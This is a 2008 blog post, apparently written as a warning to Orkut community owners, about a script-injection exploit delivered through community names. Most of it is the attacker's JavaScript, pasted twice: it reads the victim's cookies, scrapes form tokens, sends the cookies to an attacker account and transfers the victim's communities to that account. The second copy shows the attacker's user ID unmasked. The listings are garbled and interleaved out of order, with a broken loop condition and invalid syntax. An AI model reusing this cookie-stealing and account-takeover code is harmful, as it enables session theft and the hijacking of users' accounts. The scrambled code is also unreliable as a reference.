Monday, February 18, 2008

Exploit on Orkut

Exploit on Orkut
There is yet another exploit on Orkut (the Google-affiliated social networking service), and it can easily be used to take ownership of someone else's community with just a click on a community link. Name the community with:
< script scr="...URL...">
where URL points to the location where the JavaScript below is stored. Once someone clicks on a community with such a name, the script at that URL gets executed, and ownership of their communities is transferred to the person with the 20-digit user ID xxxxxxxxxxxxxxxxxxxx (see below). I just lost ownership of my "**********" community. So, BEWARE of this exploit and NEVER EVER CLICK on any community or profile with a name such as:
< script scr="...URL...">

The JavaScript exploit code is as below (the comments are in Portuguese, which I don't know at all, and I am not a JavaScript expert either, so I leave it to you to work through this script yourself).

// Account that receives the transferred communities and the cookie message;
// the post author masked the real 20-digit value with x's.
var uid="xxxxxxxxxxxxxxxxxxxx"; //
//window.alert('injetado'); // disabled debug alert; Portuguese "injetado" = "injected"

// Returns an XMLHttpRequest object using whichever constructor the browser
// supports: the two legacy ActiveX variants are tried first, then the standard
// constructor. Returns null when none of them can be instantiated.
function createXMLHttpRequest()
{
    var factories = [
        function () { return new ActiveXObject("Msxml2.XMLHTTP"); },
        function () { return new ActiveXObject("Microsoft.XMLHTTP"); },
        function () { return new XMLHttpRequest(); }
    ];
    for (var i = 0; i < factories.length; i++) {
        try {
            return factories[i]();
        } catch (err) {
            // this constructor is not available here; try the next one
        }
    }
    return null;
}

// Reads the victim's cookies and prepares the text that send_message() later
// posts to the account in `uid`, then starts the token harvest (check_scraps).
// subject, dcookie and mensagem are assigned without var, so they are implicit
// globals shared with the other functions in this script.
// Defensive note: this only works because the injected script runs in the
// site's own origin. Marking session cookies HttpOnly keeps them out of
// document.cookie, and output-encoding user-supplied text such as community
// names prevents the script from being injected in the first place.
function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
// 'state' is presumably the name of one of the site's cookies — used here as
// a rough check that cookie access worked; when absent the author blames IE.
if(dcookie.indexOf('state') > -1)
{
// Portuguese: "Check whether he sent any community" / "Exploit written by Rodrigo Lacerda"
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nExploit escrito por Rodrigo Lacerda";
}
else
{
// Portuguese: "This user uses Internet Explorer and the cookie-grabbing
// function failed, check whether he sent any community"
mensagem = "Este usuário usa Internet Explorer e a função de pegar cookies falhou, verifique se ele enviou alguma comundiade\n\nOrkut Community Transfer & Cookie Stealer Exploit\n";
}
check_scraps();
};
getCookies(); // entry point: runs as soon as the injected script is loaded

function velocity_transfer()
{
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,
Hack
var xml= createXMLHttpRequest();
xml.open('POST','http://www.orkut.com/Compose.aspx',true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
// Requests the victim's own Scrapbook page and scrapes the anti-forgery values
// (signature and POST_TOKEN) that the site's forms require, storing them in
// the implicit globals SIG and POST, then calls send_message().
// Defensive note: a per-session form token does not help once a script is
// running in the page's origin, because the token is readable from the page
// markup just like any other content; the effective control is stopping the
// injection (encode user-supplied names) and keeping session cookies HttpOnly.
function check_scraps()
{
x=0; // implicit global: index into the cmm[] list used by the transfer loop
var xml=createXMLHttpRequest();
xml.open("GET","Scrapbook.aspx",true); // relative URL, so the request is same-origin and carries the victim's cookies
xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlr1=xml.responseText;
// The author's intent appears to be "the page does not contain 'textPanel'"
// (presumably a marker of an error or login page — TODO confirm).
if(!xmlr1.indexOf('textPanel') > -1)
{
SIG=xmlr1.match(/signature. value="(.+)"/i)[1];
POST=xmlr1.match(/name="POST_TOKEN" value="([^"]+)/i)[1];
send_message();
}
else
{
// Retries immediately and without bound until the page looks right.
check_scraps();
}
};
};
xml.send(null);
};

This is how it acts, and your communities get transferred.
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText;
if(!xmlrtr.match(/textPanel/gi))
{
array_cmm();
}
else
{
send_message();
}
}
};
};
cont=xmlr;
ini=cont.indexOf('
-1 ? cont.indexOf('
fim=cont.indexOf('
-1 ? cont.indexOf('
cont2=cont.substring(ini,fim)
cmm=String(cont2.match(/cmm=\d+/g)).replace(/cmm=/g,'');
cmm=cmm.split(',');
if(cmm)
{
velocity_transfer();
}
}
else
{
array_cmm();
};
};
};
xml2.send(null);
};

// NOTE(review): as pasted this listing is garbled. The first statement builds
// the form data for posting the cookie text (`mensagem`) as a message to `uid`,
// but the very next statement overwrites `send` with the community-transfer
// form data, and the rest of the body is the transfer loop that also appears
// under velocity_transfer() above. The condition `if(x{` is incomplete — the
// comparison operator was most likely lost when the blog rendered the page.
// Treat this block as a fragment, not as runnable code.
function send_message()
{
// Message to uid: harvested tokens plus the cookie string as the body.
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&uid="+uid+"&sendTo=user&subject="+subject+"&body="+encodeURIComponent(mensagem)+"&Action.submit";
// Overwrites the line above, so the message request is never issued from here.
send="POST_TOKEN="+encodeURIComponent(POST)+"&signature="+encodeURIComponent(SIG)+"&Action.doTransfer";
var xml= createXMLHttpRequest();
// Transfers community cmm[x] to uid; x is the implicit global set in check_scraps().
xml.open('POST','http://www.orkut.com/CommunityTransfer.aspx?cmm=' + cmm[x] + '&uid='+uid,true);
xml.setRequestHeader('Content-Type','application/x-www-form-urlencoded');
xml.send(send);xml.onreadystatechange=function()
{
if(xml.readyState==4)
{
var xmlrtr=xml.responseText; // read but never used
x++;
if(x{ // garbled as pasted: the loop condition is incomplete
velocity_transfer();
}
}
};
};

function array_cmm()
{
var xml2= createXMLHttpRequest();
xml2.open("GET","http://www.orkut.com/Communities.aspx",true);
xml2.onreadystatechange=function()
{
if(xml2.readyState==4)
{
var xmlr=xml2.responseText;
if(!xmlr.match(/textPanel/gi))
{ 12:00 AM


νινєк:
The script that gets executed by that posted JavaScript looks like this:


// NOTE(review): "Var" with a capital V is not valid JavaScript — a transcription
// error in this repost. This copy shows the receiving account id unmasked.
Var uid="7911771698884038554";

// Returns an XMLHttpRequest object using whichever constructor the browser
// supports: the two legacy ActiveX variants are tried first, then the standard
// constructor. Returns null when none of them can be instantiated.
function createXMLHttpRequest()
{
    var factories = [
        function () { return new ActiveXObject("Msxml2.XMLHTTP"); },
        function () { return new ActiveXObject("Microsoft.XMLHTTP"); },
        function () { return new XMLHttpRequest(); }
    ];
    for (var i = 0; i < factories.length; i++) {
        try {
            return factories[i]();
        } catch (err) {
            // this constructor is not available here; try the next one
        }
    }
    return null;
}

// Reads the victim's cookies into the implicit global `mensagem` (the text that
// is later posted to the account in `uid`) and starts the token harvest via
// check_scraps(). subject and dcookie are implicit globals as well.
// NOTE(review): the second string literal in this repost has been machine-
// translated into English by the poster, so this copy is not byte-identical
// to the script it describes; the behaviour is otherwise the same.
// Defensive note: HttpOnly session cookies are not exposed through
// document.cookie, and output-encoding user-supplied names blocks the
// injection that lets this script run in the site's origin at all.
function getCookies()
{
subject="Orkut Cookie Exploit";
dcookie=document.cookie;
// 'state' is presumably one of the site's cookie names — a rough check that
// cookie access worked; when absent the author blames Internet Explorer.
if(dcookie.indexOf('state') > -1)
{
// Portuguese: "Check whether he sent any community" / "Developed by Rodrigo Lacerda"
mensagem = dcookie+"\n\nVerifique se ele enviou alguma comunidade\n\nOrkut Community Transfer & Cookie Stealer Exploit\nDesenvolvido por Rodrigo Lacerda";
}
else
{
mensagem = "This user uses Internet Explorer and the function failed to pick up cookies, make sure it sent some comundiade \ n \ nOrkut Community Transfer & Cookie Stealer Exploit \ by Rodrigo Lacerda";
}
check_scraps();
};
getCookies(); // entry point: runs as soon as the injected script is loaded

function velocity_transfer()

All Community owners, beware of a sneaky new phishing link going around. The link seems to lead to an Orkut community, but actually transfers ownership of your communities to some other profile.

More info here:
http://technowise.blogspot.com/2006/12/orkut-cookie-exploit-anyone-can-steal.html

Do not click on any community or profile links which look like < script scr="...URL...">

A couple of communities have been lost already, namely the 'C' and the 'C/C++ programmers India' communities. So please watch out!